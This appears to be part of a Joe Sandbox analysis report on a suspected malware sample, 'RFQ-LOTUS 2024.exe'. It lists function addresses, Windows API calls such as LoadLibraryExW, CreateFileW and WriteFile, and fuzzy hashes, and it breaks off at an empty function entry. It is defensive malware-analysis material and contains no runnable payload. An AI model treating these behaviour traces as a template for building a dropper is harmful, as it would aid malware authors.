Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
Instruction ID: 1204d1a220e6d768f3d461a9159a4fc95a2ffbde449ffc0b80a50a9695adc5d2
Opcode Fuzzy Hash: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
Instruction Fuzzy Hash: 4E01D132624210ABE7095B389D04B6A3698E751315F10CA3BB851F66F1DA7C8C428B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406407 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
GetProcAddress.KERNEL32(00000000,?), ref: 00406434

Part of subcall function 00406397: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063AE
Part of subcall function 00406397: wsprintfW.USER32 ref: 004063E9
Part of subcall function 00406397: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063FD

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
Instruction ID: e585cff6f5786af6166c4577b0086b93443bcdd3738d69eb1d3bc5833b741c46
Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
Instruction Fuzzy Hash: 40E08C32604220AAD2119B749E8493B66A8AE99740302043FF946F2080DB78EC329AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405C02 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405C06
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405C28

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405BDD Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,004057E2,00000000,?,00000000,004059B8,?,?,?,?), ref: 00405BE2
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BF6

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 8fdcebde4214434899a3f1b003f07ebd3e102d67d4793912b01b2ec481300f1c
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 22D0C972904520ABC2102728AE0889BBF65EB542717024B35FAA9A22B0CB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 004056D8 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004056DE
GetLastError.KERNEL32 ref: 004056EC

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: b0cc9022c7fc522e2a1325a3a88c93622829811feb2dde411d36191549599a95
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: B3C04C70615602DAE6105B20DE1971B7954AB50741F51883A614AE11A0DA758455DE2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C85 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C99

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: 1f5957c0360fd8fa5667ae66c631dc737c687ff57a2230ad484cb91cc4d73fb5
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: E7E08C3220421AABEF109E618C00AEB7B6CEF05364F004436F922E2140E234E8218BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6D8,000000FF,0078B6D8,000000FF,000000FF,00000004,00000000), ref: 00405CC8

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 98013b39db6e85760f5ab21dfedcc60362cbd5470676cd53f11b5d229ee65248
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: A0E0463221425AABEF109E508C00AAB3B6CEB00261F104432B915E6040E630E961ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040413D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
Instruction ID: e107f78b1bc9bc3d7278e4c5f459ebf6569cc91abc8b2cca8897f7623fe5a1fb
Opcode Fuzzy Hash: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
Instruction Fuzzy Hash: 97C09BB1744701BBDB109B509D4DF17775D6794700F1584297350F61D4D674E450D61D

Uniqueness

Uniqueness Score: -1.00%

Function 00404126 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
Instruction ID: 6c025a846befaa099d481c36b27a79c5fc7dd1f0b3caa6cf802aff4301849ee4
Opcode Fuzzy Hash: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
Instruction Fuzzy Hash: 02B09236190A00BADA614B00EE09F457A62A7AC701F00C429B240240B0CAB200A0DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00403235 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00403243

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403EEB), ref: 0040411D

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
Instruction ID: 30bcdc9e1ec4e9f5bd758bba81a049f6052f636b6f7eedaabba742a71ce1d9c6
Opcode Fuzzy Hash: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
Instruction Fuzzy Hash: 43A0113A008200AFCF028B80EF08C0ABB22ABE0300B22C038A28080030CB3208A0EB08

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040581E Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

